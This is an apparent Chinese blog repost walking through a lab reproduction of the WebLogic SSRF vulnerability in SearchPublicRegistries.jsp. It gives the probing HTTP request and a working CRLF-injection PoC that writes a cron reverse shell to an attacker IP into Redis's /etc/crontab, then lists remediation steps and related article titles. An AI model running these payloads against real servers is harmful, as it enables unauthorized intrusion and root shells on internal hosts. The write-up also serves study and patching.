2. 程式人生 > 其它 >Weblogic SSRF漏洞

Weblogic SSRF漏洞

阿新 發佈:2022-04-21

1、漏洞描述

    SSRF(Server-Side Request Forgery,伺服器請求偽造)是一種由攻擊者構造請求,由服務端發起請求的安全漏洞,一般情況下,SSRF攻擊的目標是外網無法訪問的內網系統(正因為請求時由服務端發起的,所以服務端能請求到與自身相連而與外網隔絕的內部系統)。
  SSRF漏洞形成的原因大都是由於服務端提供了從其他伺服器應用獲取資料的功能且沒有對目標地址做過濾與限制。
該漏洞危害:

1) 掃描內網(主機資訊收集,Web應用指紋識別)
2) 根據所識別應用傳送構造的Payload進行攻擊
3) Denial of service(請求大檔案,始終保持連線Keep-Alive Always)

2、復現環境:

 攻擊機(kali):192.168.4.157

 目標機(ubuntu):192.168.4.128

 內網redis伺服器:172.18.0.2

3、漏洞復現:

 SSRF漏洞存在於http://192.168.4.128:7001/uddiexplorer/SearchPublicRegistries.jsp,我們在brupsuite下測試該漏洞。

 

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: 192.168.4.128:7001
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

可訪問的埠將會得到錯誤,一般是返回status code(如下圖),如果訪問的非http協議,則會返回did not have a valid SOAP content-type

 修改為一個不存在的埠,將會返回could not connect over HTTP to server


通過錯誤的不同,即可探測內網狀態。

注入HTTP頭,利用Redis反彈shell

Weblogic的SSRF有一個比較大的特點,其雖然是一個“GET”請求,但是我們可以通過傳入%0a%0d來注入換行符,而某些服務(如redis)是通過換行符來分隔每條命令,也就說我們可以通過該SSRF攻擊內網中的redis伺服器。

傳送三條redis命令,將彈shell指令碼寫入/etc/crontab
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.4.157/1236 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aa

 

進行URL編碼:set%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.4.157%2F1236%200%3E%261%5Cn%5Cn%5Cn%

 poc:

http://172.18.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.4.157%2F1236%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaa

 通過上面反彈shell指令碼的執行,成功反彈內網redis伺服器的shell

 4、修復方法:

    方法一:
         刪除uddiexplorer資料夾
         限制uddiexplorer應用只能內網訪問
 方法二:
      將SearchPublicRegistries.jsp直接刪除

 方法三:
    Weblogic服務端請求偽造漏洞出現在uddi元件(所以安裝Weblogic時如果沒有選擇uddi元件那麼就不會有該漏洞),更準確地說是uudi包實現包uddiexplorer.war下的SearchPublicRegistries.jsp。方法三採用的是改後輟的方式,修復步驟如下:
        將weblogic安裝目錄下的wlserver_10.3/server/lib/uddiexplorer.war做好備份
        將weblogic安裝目錄下的server/lib/uddiexplorer.war下載
        用winrar等工具開啟uddiexplorer.war
        將其下的SearchPublicRegistries.jsp重新命名為SearchPublicRegistries.jspx
        儲存後上傳回服務端替換原先的uddiexplorer.war
        對於多臺主機組成的叢集,針對每臺主機都要做這樣的操作
        由於每個server的tmp目錄下都有快取所以修改後要徹底重啟weblogic(即停應用–停server–停控制檯–啟控制檯–啟server–啟應用)

相關推薦

Weblogic SSRF漏洞

1、漏洞描述     SSRF(Server-Side Request Forgery,伺服器請求偽造)是一種由攻擊者構造請求,由服務端發起請求的安全漏洞,一般情況下,SSRF攻擊的目標是外網無法訪問的內網系統(正因為請求時由服務端發起的,所以服

SSRF漏洞

SSRF參考視訊 (源自嗶哩嗶哩): https://www.bilibili.com/video/BV1p4411X7UZ?p=60 參考文章 :

SSRF漏洞利用之Redis大神賜予shell

0x00實驗環境 1、centos靶機(IP為:192.168.11.205,橋接模式) 2、kali黑客攻擊主機(IP為:192.168.172.129,NAT模式)

SSRF漏洞簡單分析

什麼是SSRF漏洞 SSRF(伺服器端請求偽造)是一種由攻擊者構造請求,伺服器端發起請求的安全漏洞,所以,一般情況下,SSRF攻擊的目標是外網無法訪問的內部系統。

SSRF漏洞總結

SSRF是什麼? (服務端請求偽造)是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞

4-16 SSRF漏洞

4-16 SSRF漏洞 1. 漏洞原理 1. 背景: 網際網路上很多web應用提供了能向其他伺服器(也可以是當前伺服器本地)請求獲取資料的功能。一般來說,web應用會通過使用者指定的URL,去向其他伺服器發起請求獲取獲取圖片、

SSRF漏洞(原理、挖掘點、漏洞利用、修復建議)

1.介紹SSRF漏洞 SSRF (Server-Side Request Forgery,伺服器端請求偽造)是一種由攻擊者構造請求,由服務端發起請求的安全漏洞。一般情況下,SSRF攻擊的目標是外網無法訪問的內部系統(正因為請求是由服務端發起的,所以

SSRF漏洞基礎知識

一、漏洞的定義 SSRF(Server-Side Request Forgery:伺服器端請求偽造) 是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞。一般情況下,SSRF攻擊的目標是從外網無法訪問的內部系統。

SSRF漏洞利用

一、判斷漏洞是否存在 1.基本判斷(排除法) 如:http://www.douban.com/***/service?image=http://www.baidu.com/img/bd_logo1.png

SSRF漏洞可利用協議學習(PHP支援的協議和封裝協議)

支援的協議和封裝協議 https://www.php.net/manual/zh/wrappers.php PHP 帶有很多內建 URL 風格的封裝協議,可用於類似 fopen()、 copy()、 file_exists() 和 filesize() 的檔案系統函式。 除了這些封裝協議,還能

Apache Solr RemoteStreaming 檔案讀取與SSRF漏洞

Apache Solr 是一個開源的搜尋伺服器。在Apache Solr未開啟認證的情況下,攻擊者可直接構造特定請求開啟特定配置,並最終造成SSRF或任意檔案讀取。

Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438)

Apache HTTP Server專案是為包括UNIX和Windows在內的現代作業系統開發和維護開源HTTP伺服器的努力,是Apache基金會開源的一款流行的HTTP伺服器。在其2.4.48及以前的版本中,mod_proxy模組存在一處邏輯錯誤導致攻擊者

Python開發Brup外掛檢測SSRF漏洞和URL跳轉

作者:饅頭,部落格地址:https://www.cnblogs.com/mantou0/ 出身: 作為一名安全人員,工具的使用是必不可少的,有時候開發一些自己用的小工具在滲透時能事半功倍。在平常的滲透測試中和SRC漏洞挖掘中Brupsuite使用

漏洞復現——weblogic任意檔案上傳(cve-2018-2894)

0X01漏洞簡介: Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。

weblogicssrf到redis獲取shell

目錄前言一、環境搭建和知識儲備1.1、影響版本1.2、Docker搭建環境二、漏洞復現2.1、weblogicSSRF漏洞2.2、weblogicSSRF回顯型別2.3、weblogic-SSRF漏洞判斷POC三、漏洞利用3.1、利用redis獲取shell3.1.1、redis

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

CVE-2020-14644 weblogic iiop反序列化漏洞

0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 0x01 環境準備

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現 漏洞介紹 今日,Oracle官方釋出WebLogic安全更新,其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645),該漏洞通過T3協議進行利用,攻擊者可以實現遠端程式碼執行

【vulhub】Weblogic CVE-2017-10271漏洞復現&&流量分析

Weblogic CVE-2017-10271 漏洞復現&&流量分析 Weblogic CVE-2017-10271 XMLDecoder反序列化

(CVE-2018-2894)Weblogic任意檔案上傳漏洞復現

漏洞說明 Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案上傳漏洞Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。